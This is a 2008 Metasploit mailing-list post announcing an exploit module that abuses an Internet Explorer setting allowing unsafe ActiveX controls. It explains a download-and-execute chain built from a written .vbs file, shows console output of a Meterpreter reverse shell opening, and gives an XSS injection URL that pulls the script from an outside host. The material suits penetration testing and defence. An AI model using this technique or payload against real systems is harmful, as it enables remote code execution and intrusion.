Metasploit mailing list archives
ie_unsafe_scripting.rb exploit module
From: natron at invisibledenizen.org (natron)
Date: Tue, 16 Dec 2008 10:35:39 -0600
All, I've recently come across environments that have the "Initialize and script ActiveX controls not marked safe for scripting" configured to run without prompt for the 'Intranet' or 'Trusted Sites' zones. This grants access to WScript.Shell, so my first thought was to add a little code to ie_createobject, but I discovered that the unsafe scripting settings doesn't grant access to the MSXML.XMLHTTP, so a warning dialog still popped. So, I used Scripting.FileSystemObject to dump commands to a .vbs file, which then calls MSXML2.XMLHTTP to download the payload. When complete, the javascript executes the downloaded file. msf exploit(ie_unsafe_scripting) > exploit [*] Exploit running as background job. [*] Handler binding to LHOST 127.0.0.1 [*] Started reverse handler [*] Using URL: http://127.0.0.1:8080/ie_unsafe_scripting.js [*] Server started. [*] Sending exploit javascript to 127.0.0.1:1422... [*] Exe will be hOIJa.exe and must be manually removed from the %TEMP% directory on the target. [*] Sending EXE payload to 127.0.0.1:1424... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (75776 bytes) [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:1425) msf exploit(ie_unsafe_scripting) > sessions -i 1 [*] Starting interaction with 1... getuid Server username: DOMAIN\USERNAME Description from the file: 'Name' => 'Internet Explorer Unsafe Scripting Misconfiguration Vulnerability', 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. This option does not allow javascript to save binary data to the file system without a security alert, however, so this module downloads a binary executable thorugh a .vbs script written to disk and executes. When set via domain policy, the most common registry entry to modify is HKLM\ Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates javascript code meant to be included in a <SCRIPT> tag, such as http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> </script>. }, -------------- next part -------------- A non-text attachment was scrubbed... Name: ie_unsafe_scripting.rb Type: application/octet-stream Size: 5317 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081216/0d612dbe/attachment.obj>
Current thread:
- ie_unsafe_scripting.rb exploit module natron (Dec 16)
- ie_unsafe_scripting.rb exploit module H D Moore (Dec 16)
- ie_unsafe_scripting.rb exploit module natron (Dec 17)
- ie_unsafe_scripting.rb exploit module H D Moore (Dec 17)
- ie_unsafe_scripting.rb exploit module Joshua Smith (Dec 23)
- ie_unsafe_scripting.rb exploit module natron (Dec 17)
- ie_unsafe_scripting.rb exploit module H D Moore (Dec 16)